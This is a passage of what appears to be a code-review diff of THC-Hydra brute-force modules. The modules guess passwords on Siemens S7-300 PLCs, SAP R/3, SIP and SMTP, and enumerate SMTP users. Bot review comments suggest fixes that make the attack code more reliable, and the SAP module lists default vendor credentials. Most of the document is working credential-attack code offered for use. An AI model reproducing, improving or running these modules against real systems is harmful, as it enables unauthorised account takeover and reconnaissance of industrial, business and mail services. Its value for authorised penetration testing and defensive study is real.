unsigned char encoded_password[S7PASSLEN];
char *spaces = " ";
int ret = -1;
int i;
if (port != 0)
s7port = port;
if (debug || verbose)
printf("[INFO] Checking authentication setup...\n");
sock = hydra_connect_tcp(ip, s7port);
if (sock < 0) {
hydra_report(stderr, "[ERROR] Can not connect to port %d on the target\n", s7port);
return 2;
}
pass = empty;
// prepare password
memset(context, 0, sizeof(context));
strncat(context, spaces, S7PASSLEN - strlen(pass));
// encode password
encoded_password[0] = context[0] ^ 0x55;
encoded_password[1] = context[1] ^ 0x55;
for (i = 2; i < S7PASSLEN; i++) {
encoded_password[i] = context[i] ^ encoded_password[i-2] ^ 0x55 ;
}
// send p_cotp and check first 2 bytes of answer
if (hydra_send(sock, (char *) p_cotp, 22, 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "[ERROR] did not received data from the service\n");
return 3;
}
if (ret < 2 || (buffer[0] != 0x03 && buffer[1] != 0x00)) {
fprintf(stderr, "[ERROR] invalid reply to init packet\n");
return 3;
}
// send p_s7_negotiate_pdu and check first 2 bytes of answer
if (hydra_send(sock, (char *) p_s7_negotiate_pdu, 25, 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service (2)\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "[ERROR] did not received data from the service (2)\n");
return 3;
}
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00)) {
fprintf(stderr, "[ERROR] invalid reply to init packet (2)\n");
return 3;
}
// send p_s7_read_szl and check first 2 bytes of answer
if (hydra_send(sock, (char *) p_s7_read_szl, 33, 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service (3)\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) >= 0) {
fprintf(stderr, "[ERROR] did not received data from the service (3)\n");
return 3;
}
if (ret > 2 && (buffer[0] != 0x03 && buffer[1] != 0x00) ) {
fprintf(stderr, "[ERROR] invalid reply to init packet (3)\n");
return 3;
}
// so now add encoded_password to p_s7_password_request and send
memset(buffer, 0, sizeof(buffer));
memcpy(buffer, p_s7_password_request, 29);
memcpy(buffer + 29, encoded_password, S7PASSLEN);
if (hydra_send(sock, buffer, 29 + S7PASSLEN , 0) < 0) {
fprintf(stderr, "[ERROR] can not send data to service (4)\n");
return 3;
}
memset(buffer, 0, sizeof(buffer));
if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) <= 0) {
fprintf(stderr, "[ERROR] did not received data from the service (4)\n");
return 3;
}
// now check answer
// 0x0000 - valid password
// 0xd605 - no password
// 0xd602 - wrong password
if (ret > 30) {
if ((buffer[27] == '\x00' && buffer[28] == '\x00') || (buffer[27] == '\xd6' && buffer[28] == '\x05')) {
hydra_report(stderr, "[INFO] No password protection enabled, no password tests are necessary!\n");
return 1;
}
}
sock = hydra_disconnect(sock);
return 0;
}
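Review bot: In service_s7_300_init the third receive check is inverted: `if ((ret = hydra_recv_nb(sock, buffer, sizeof(buffer))) >= 0)` takes the error path whenever the reply to p_s7_read_szl arrives and lets a failed receive through, while the other three reads in this function test `<= 0`. Change it to `<= 0`. Separately, the header test `buffer[0] != 0x03 && buffer[1] != 0x00` used throughout the file rejects a reply only when both bytes are wrong; `||` would match the comment "check first 2 bytes of answer". The first check in init guards it with `ret < 2 ||` while every other one uses `ret > 2 &&`, so pick one form. The `return 3` and `return 1` paths in init also leave `sock` open; only the final path calls hydra_disconnect.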

132
hydra-sapr3.c Normal file

@ -0,0 +1,132 @@
#include "hydra-mod.h"
// checked for memleaks on 110425, none found
#ifndef LIBSAPR3
void dummy_sapr3() {
printf("\n");
}
#else
#include <saprfc.h>
#include <ctype.h>
/* temporary workaround fix */
const int *__ctype_tolower;
const int *__ctype_toupper;
const int *__ctype_b;
extern void flood(); /* for -lm */
extern char *HYDRA_EXIT;
RFC_ERROR_INFO_EX error_info;
int start_sapr3(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
RFC_HANDLE handle;
char *empty = "";
char *login, *pass, buffer[1024];
char *buf;
int i;
int sysnr = port % 100;
char opts[] = "RFCINI=N RFCTRACE=N BALANCE=N DEBUG=N TRACE=0 ABAP_DEBUG=0";
// char opts[] = "RFCINI=N RFCTRACE=Y BALANCE=N DEBUG=Y TRACE=Y ABAP_DEBUG=Y";
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (strlen(login) > 0)
for (i = 0; i < strlen(login); i++)
login[i] = (char) toupper(login[i]);
if (strlen(pass) > 0)
for (i = 0; i < strlen(pass); i++)
pass[i] = (char) toupper(pass[i]);
memset(buffer, 0, sizeof(buffer));
memset(&error_info, 0, sizeof(error_info));
//strcpy(buf, "mvse001");
snprintf(buffer, sizeof(buffer), "ASHOST=%s SYSNR=%02d CLIENT=%03d USER=\"%s\" PASSWD=\"%s\" LANG=DE %s", hydra_address2string(ip), sysnr, atoi(miscptr), login, pass, opts);
/*
USER=SAPCPIC PASSWORD=admin
USER=SAP* PASSWORD=PASS
## do we need these options?
SAPSYS=3 SNC_MODE=N SAPGUI=N INVISIBLE=N GUIATOPEN=Y NRCALL=00001 CLOSE=N
ASHOST= // IP
SYSNR= // port - 3200, scale 2
CLIENT= // miscptr, scale 2
ABAP_DEBUG=0
USER=
PASSWD=
LANG=DE
*/
//printf ("DEBUG: %d Connectstring \"%s\"\n",sizeof(error_info),buffer);
handle = RfcOpenEx(buffer, &error_info);
//printf("DEBUG: handle %d, key %s, message %s\n", handle, error_info.key, error_info.message);
if (handle <= RFC_HANDLE_NULL)
return 3;
if (strstr(error_info.message, "sapgui") != NULL || strlen(error_info.message) == 0) {
hydra_report_found_host(port, ip, "sapr3", fp);
hydra_completed_pair_found();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
return 1;
} else {
if (strstr(error_info.key, "ERROR_COMMUNICATION") != NULL) {
/* sysnr does not exist, report as port closed */
return 3;
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 2;
}
return 1;
}
void service_sapr3(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
next_run = start_sapr3(sock, ip, port, options, miscptr, fp);
break;
case 2:
hydra_child_exit(0);
case 3: /* clean exit */
fprintf(stderr, "[ERROR] could not connect to target port %d\n", port);
hydra_child_exit(1);
case 4:
hydra_child_exit(2);
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(2);
}
run = next_run;
}
}
#endif
int service_sapr3_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
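Review bot: start_sapr3 fills CLIENT= with `atoi(miscptr)` and nothing in this file checks miscptr for NULL, while service_sapr3_init returns 0 unconditionally. Validate the client option once in service_sapr3_init and return -1 with a clear message when it is missing or not numeric. In the same snprintf, login and pass are placed inside `USER=\"%s\" PASSWD=\"%s\"` without escaping, so a candidate containing a double quote changes how the rest of the connect string is parsed; skip or escape such values. The toupper loops also rewrite the buffers returned by hydra_get_next_login() and hydra_get_next_password() in place, and cases 2 to 4 of the switch in service_sapr3 have no break or return and rely on hydra_child_exit not returning.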

303
hydra-sip.c Normal file

@ -0,0 +1,303 @@
/* simple sip digest auth (md5) module 2009/02/19
* written by gh0st 2005
* modified by Jean-Baptiste Aviat <jba [at] hsc [dot] `french tld`> - should
* work now, but only with -T 1
*
* 05042011 david: modified to use sasl lib
*/
#ifndef LIBOPENSSL
#include <stdio.h>
void dummy_sip() {
printf("\n");
}
#else
#include "sasl.h"
#include "hydra-mod.h"
extern int hydra_data_ready_timed(int socket, long sec, long usec);
char external_ip_addr[17] = "";
char *get_iface_ip(unsigned long int ip);
int cseq;
extern char *HYDRA_EXIT;
#define SIP_MAX_BUF 1024
void empty_register(char *buf, char *host, char *lhost, int port, int lport, char *user) {
memset(buf, 0, SIP_MAX_BUF);
snprintf(buf, SIP_MAX_BUF,
"REGISTER sip:%s SIP/2.0\r\n"
"Via: SIP/2.0/UDP %s:%i\r\n"
"From: <sip:%s@%s>\r\n"
"To: <sip:%s@%s>\r\n" "Call-ID: 1337@%s\r\n" "CSeq: %i REGISTER\r\n" "Content-Length: 0\r\n\r\n", host, lhost, lport, user, host, user, host, host, cseq);
}
int get_sip_code(char *buf) {
int code;
char tmpbuf[SIP_MAX_BUF], word[SIP_MAX_BUF];
if (sscanf(buf, "%s %i %s", tmpbuf, &code, word) != 3)
return -1;
return code;
}
int start_sip(int s, char *ip, char *lip, int port, int lport, unsigned char options, char *miscptr, FILE * fp) {
char *login, *pass, *host, buffer[SIP_MAX_BUF];
int i;
char buf[SIP_MAX_BUF];
if (strlen(login = hydra_get_next_login()) == 0)
login = NULL;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = NULL;
if (external_ip_addr[0])
lip = external_ip_addr;
host = miscptr;
cseq = 1;
empty_register(buffer, host, lip, port, lport, login);
cseq++;
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 3;
}
int has_sip_cred = 0;
int try = 0;
/* We have to check many times because server may begin to send "100 Trying"
* before "401 Unauthorized" */
while (try < 2 && !has_sip_cred) {
try++;
if (hydra_data_ready_timed(s, 3, 0) > 0) {
i = hydra_recv(s, (char *) buf, sizeof(buf));
buf[sizeof(buf) - 1] = '\0';
if (strncmp(buf, "SIP/2.0 404", 11) == 0) {
hydra_report(stdout, "[ERROR] Get error code 404 : user '%s' not found\n", login);
return 2;
}
if (strncmp(buf, "SIP/2.0 606", 11) == 0) {
char *ptr = NULL;
int i = 0;
// if we already tried to connect, exit
if (external_ip_addr[0]) {
hydra_report(stdout, "[ERROR] Get error code 606 : session is not acceptable by the server\n");
return 2;
}
if (verbose)
hydra_report(stdout, "[VERBOSE] Get error code 606 : session is not acceptable by the server,\n"
"maybe it's an addressing issue as you are using NAT, trying to reconnect\n" "using addr from the server reply\n");
/*
SIP/2.0 606 Not Acceptable
Via: SIP/2.0/UDP 192.168.0.21:46759;received=82.227.229.137
*/
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "Via: SIP.*received=")) {
ptr = strstr(buf, "received=");
#else
if ((ptr = strstr(buf, "received="))) {
#endif
strncpy(external_ip_addr, ptr + strlen("received="), sizeof(external_ip_addr));
external_ip_addr[sizeof(external_ip_addr) - 1] = '\0';
for (i = 0; i < strlen(external_ip_addr); i++) {
if (external_ip_addr[i] <= 32) {
external_ip_addr[i] = '\0';
}
}
if (verbose)
hydra_report(stderr, "[VERBOSE] Will reconnect using external IP address %s\n", external_ip_addr);
return 1;
}
hydra_report(stderr, "[ERROR] Could not find external IP address in server answer\n");
return 2;
}
}
}
if (!strstr(buf, "WWW-Authenticate: Digest")) {
hydra_report(stderr, "[ERROR] no www-authenticate header found!\n");
return -1;
}
if (verbose)
hydra_report(stderr, "[INFO] S: %s\n", buf);
char buffer2[512];
sasl_digest_md5(buffer2, login, pass, strstr(buf, "WWW-Authenticate: Digest") + strlen("WWW-Authenticate: Digest") + 1, host, "sip", NULL, 0, NULL);
memset(buffer, 0, SIP_MAX_BUF);
snprintf(buffer, SIP_MAX_BUF,
"REGISTER sip:%s SIP/2.0\n"
"Via: SIP/2.0/UDP %s:%i\n"
"From: <sip:%s@%s>\n"
"To: <sip:%s@%s>\n"
"Call-ID: 1337@%s\n" "CSeq: %i REGISTER\n" "Authorization: Digest %s\n" "Content-Length: 0\n\n", host, lip, lport, login, host, login, host, host, cseq, buffer2);
cseq++;
if (verbose)
hydra_report(stderr, "[INFO] C: %s\n", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 3;
}
try = 0;
int has_resp = 0;
int sip_code = 0;
while (try < 2 && !has_resp) {
try++;
if (hydra_data_ready_timed(s, 5, 0) > 0) {
memset(buf, 0, sizeof(buf));
i = hydra_recv(s, (char *) buf, sizeof(buf));
if (verbose)
hydra_report(stderr, "[INFO] S: %s\n", buf);
sip_code = get_sip_code(buf);
if (sip_code >= 200 && sip_code < 300) {
hydra_report_found_host(port, ip, "sip", fp);
hydra_completed_pair_found();
has_resp = 1;
}
if (sip_code >= 400 && sip_code < 500) {
has_resp = 1;
}
}
}
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_sip(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_SIP, mysslport = PORT_SIP_SSL;
char *lip = get_iface_ip((int) *(&ip[1]));
hydra_register_socket(sp);
// FIXME IPV6
if (ip[0] != 4) {
fprintf(stderr, "[ERROR] sip module is not ipv6 enabled yet, patches are appreciated.\n");
hydra_child_exit(2);
}
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
run = 3;
int lport = 0;
while (1) {
switch (run) {
case 1:
if (sock < 0) {
if (port != 0)
myport = port;
lport = rand() % (65535 - 1024) + 1024;
hydra_set_srcport(lport);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_udp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
free(lip);
hydra_child_exit(1);
}
}
next_run = start_sip(sock, ip, lip, port, lport, options, miscptr, fp);
break;
case 2:
if (sock >= 0)
sock = hydra_disconnect(sock);
free(lip);
hydra_child_exit(2);
break;
case 3:
if (sock >= 0)
sock = hydra_disconnect(sock);
free(lip);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
free(lip);
hydra_child_exit(2);
}
run = next_run;
}
}
char *get_iface_ip(unsigned long int ip) {
int sfd;
sfd = socket(AF_INET, SOCK_DGRAM, 0);
struct sockaddr_in tparamet;
tparamet.sin_family = AF_INET;
tparamet.sin_port = htons(2000);
tparamet.sin_addr.s_addr = ip;
if (connect(sfd, (const struct sockaddr *) &tparamet, sizeof(struct sockaddr_in))) {
perror("connect");
close(sfd);
return NULL;
}
struct sockaddr_in *local = malloc(sizeof(struct sockaddr_in));
int size = sizeof(struct sockaddr_in);
if (getsockname(sfd, (void *) local, (socklen_t *) & size)) {
perror("getsockname");
close(sfd);
free(local);
return NULL;
}
close(sfd);
char buff[32];
if (!inet_ntop(AF_INET, (void *) &local->sin_addr, buff, 32)) {
perror("inet_ntop");
free(local);
return NULL;
}
char *str = malloc(sizeof(char) * (strlen(buff) + 1));
strcpy(str, buff);
free(local);
return str;
}
#endif
int service_sip_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
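Review bot: In start_sip, `buf` is an uninitialised stack array and `strstr(buf, "WWW-Authenticate: Digest")` reads it even when hydra_data_ready_timed returned no data on both passes of the first wait loop. Zero buf before the loop and return an error when nothing was received; also terminate the data at the length returned by hydra_recv (stored in `i` and never used) rather than only at `buf[sizeof(buf) - 1]`. has_sip_cred is never set, so the loop condition depends on the try counter alone. An empty login is converted to NULL and then passed to `%s` in empty_register. In service_sip, `get_iface_ip((int) *(&ip[1]))` dereferences a char pointer and so passes a single byte of the address instead of the 4-byte value, its NULL return is not checked before lip is formatted with `%s`, and the call happens before the `ip[0] != 4` check.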

1431
hydra-smb.c Normal file

File diff suppressed because it is too large

264
hydra-smtp-enum.c Normal file

@ -0,0 +1,264 @@
/*
david: module used to enum smtp users with either
VRFY, EXPN or RCPT TO command.
Optional input could be set to
VRFY, EXPN or RCPT to force the mode
login will be used as the username
passwd will be used as the domain name
*/
#include "hydra-mod.h"
extern char *HYDRA_EXIT;
char *buf;
char *err = NULL;
int tosent = 0;
#define VRFY 0
#define EXPN 1
#define RCPT 2
int smtp_enum_cmd = VRFY;
int start_smtp_enum(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
if (smtp_enum_cmd == RCPT) {
tosent = 0;
if (pass != empty) {
snprintf(buffer, sizeof(buffer), "MAIL FROM: root@%s\r\n", pass);
} else {
snprintf(buffer, sizeof(buffer), "MAIL FROM: root\r\n");
}
if (debug)
hydra_report(stderr, "DEBUG C: %s", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (debug)
hydra_report(stderr, "DEBUG S: %s", buf);
/* good return values are something like 25x */
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "^25\\d\\s")) {
#else
if (strstr(buf, "25") != NULL) {
#endif
if (pass != empty) {
snprintf(buffer, sizeof(buffer), "RCPT TO: %s@%s\r\n", login, pass);
} else {
snprintf(buffer, sizeof(buffer), "RCPT TO: %s\r\n", login);
}
tosent = 1;
} else {
err = strstr(buf, "Error");
if (err) {
if (debug) {
hydra_report(stderr, "Server %s", err);
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
}
} else {
char cmd[5] = "";
memset(cmd, 0, sizeof(cmd));
if (smtp_enum_cmd == EXPN)
strcpy(cmd, "EXPN");
else
strcpy(cmd, "VRFY");
if (pass != empty) {
snprintf(buffer, sizeof(buffer), "%s %s@%s\r\n", cmd, login, pass);
} else {
snprintf(buffer, sizeof(buffer), "%s %s\r\n", cmd, login);
}
}
if (debug)
hydra_report(stderr, "DEBUG C: %s", buffer);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (debug)
hydra_report(stderr, "DEBUG S: %s", buf);
/* good return values are something like 25x */
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "^25\\d\\s")) {
#else
if (strstr(buf, "25") != NULL) {
#endif
hydra_report_found_host(port, ip, "smtp-enum", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
err = strstr(buf, "Error");
if (err || tosent || strncmp(buf, "50", 2) == 0) {
// we should report command not identified by the server
//502 5.5.2 Error: command not recognized
//#ifdef HAVE_PCRE
// if ((debug || hydra_string_match(buf, "\\scommand\\snot\\srecognized")) && err) {
//#else
// if ((debug || strstr(buf, "command") != NULL) && err) {
//#endif
// hydra_report(stderr, "Server %s", err);
// }
if (strncmp(buf, "500 ", 4) == 0) {
hydra_report(stderr, "[ERROR] command is disabled on the server (choose different method): %s", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
//503 5.5.1 Error: nested MAIL command
strncpy(buffer, "RSET\r\n", sizeof(buffer));
free(buf);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_smtp_enum(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1, i = 0;
int myport = PORT_SMTP, mysslport = PORT_SMTP_SSL;
char *buffer = "HELO hydra\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = myport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* receive initial header */
if ((buf = hydra_receive_line(sock)) == NULL)
hydra_child_exit(2);
if (strstr(buf, "220") == NULL) {
hydra_report(stderr, "Warning: SMTP does not allow to connect: %s\n", buf);
hydra_child_exit(2);
}
// while (strstr(buf, "220 ") == NULL) {
// free(buf);
// buf = hydra_receive_line(sock);
// }
// if (buf[0] != '2') {
if (hydra_send(sock, buffer, strlen(buffer), 0) < 0) {
free(buf);
hydra_child_exit(2);
}
// }
free(buf);
if ((buf = hydra_receive_line(sock)) == NULL)
hydra_child_exit(2);
if (buf[0] != '2') {
hydra_report(stderr, "Warning: SMTP does not respond correctly to HELO: %s\n", buf);
hydra_child_exit(2);
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strncmp(miscptr, "EXPN", 4) == 0)
smtp_enum_cmd = EXPN;
if (strncmp(miscptr, "RCPT", 4) == 0)
smtp_enum_cmd = RCPT;
}
if (debug) {
switch (smtp_enum_cmd) {
hydra_report(stdout, "[VERBOSE] ");
case VRFY:
hydra_report(stdout, "using SMTP VRFY command\n");
break;
case EXPN:
hydra_report(stdout, "using SMTP EXPN command\n");
break;
case RCPT:
hydra_report(stdout, "using SMTP RCPT TO command\n");
break;
}
}
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_smtp_enum(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0) {
sock = hydra_disconnect(sock);
}
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_smtp_enum_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
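Review bot: Without HAVE_PCRE, both success tests in start_smtp_enum are `strstr(buf, "25") != NULL`, which matches "25" anywhere in the reply line, so a rejection whose text happens to contain 25 is reported as a found user; the PCRE branch anchors the match with `^25\\d\\s`. Use `strncmp(buf, "25", 2) == 0` in the two fallback sites. In the RCPT path the MAIL FROM reply held in buf is not freed before the next hydra_receive_line() overwrites the pointer. In service_smtp_enum the SSL branch sets `port = myport` after connecting to mysslport, and the `hydra_report(stdout, "[VERBOSE] ")` placed before the first case label of the debug switch is never executed.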

451
hydra-smtp.c Normal file

@ -0,0 +1,451 @@
#include "hydra-mod.h"
#include "sasl.h"
extern char *HYDRA_EXIT;
char *buf;
int smtp_auth_mechanism = AUTH_LOGIN;
char *smtp_read_server_capacity(int sock) {
char *ptr = NULL;
int resp = 0;
char *buf = NULL;
do {
if (buf != NULL)
free(buf);
ptr = buf = hydra_receive_line(sock);
if (buf != NULL) {
if (isdigit((int) buf[0]) && buf[3] == ' ')
resp = 1;
else {
if (buf[strlen(buf) - 1] == '\n')
buf[strlen(buf) - 1] = 0;
if (buf[strlen(buf) - 1] == '\r')
buf[strlen(buf) - 1] = 0;
#ifdef NO_RINDEX
if ((ptr = strrchr(buf, '\n')) != NULL) {
#else
if ((ptr = rindex(buf, '\n')) != NULL) {
#endif
ptr++;
if (isdigit((int) *ptr) && *(ptr + 3) == ' ')
resp = 1;
}
}
}
} while (buf != NULL && resp == 0);
return buf;
}
int start_smtp(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[500], buffer2[500];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
while (hydra_data_ready(s) > 0) {
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
free(buf);
}
switch (smtp_auth_mechanism) {
case AUTH_PLAIN:
sprintf(buffer, "AUTH PLAIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
sprintf(buffer, "AUTH CRAM-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP CRAM-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "AUTH DIGEST-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
if (verbose)
hydra_report(stderr, "DEBUG S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "smtp", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "DEBUG C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//send auth and receive challenge
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "AUTH NTLM %s\r\n", buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
//recover challenge
from64tobits((char *) buf1, buf + 4);
free(buf);
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", buf1);
}
break;
default:
/* by default trying AUTH LOGIN */
sprintf(buffer, "AUTH LOGIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
/* 504 5.7.4 Unrecognized authentication type */
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP LOGIN AUTH, either this auth is disabled\nor server is not using auth: %s\n", buf);
free(buf);
return 3;
}
free(buf);
sprintf(buffer2, "%.250s", login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
if (strstr(buf, "334") == NULL) {
hydra_report(stderr, "[ERROR] SMTP LOGIN AUTH : %s\n", buf);
free(buf);
return (3);
}
free(buf);
sprintf(buffer2, "%.250s", pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return (1);
#ifdef LIBOPENSSL
if (smtp_auth_mechanism == AUTH_DIGESTMD5) {
if (strstr(buf, "334") != NULL) {
memset(buffer2, 0, sizeof(buffer2));
from64tobits((char *) buffer2, buf + 4);
if (strstr(buffer2, "rspauth=") != NULL) {
hydra_report_found_host(port, ip, "smtp", fp);
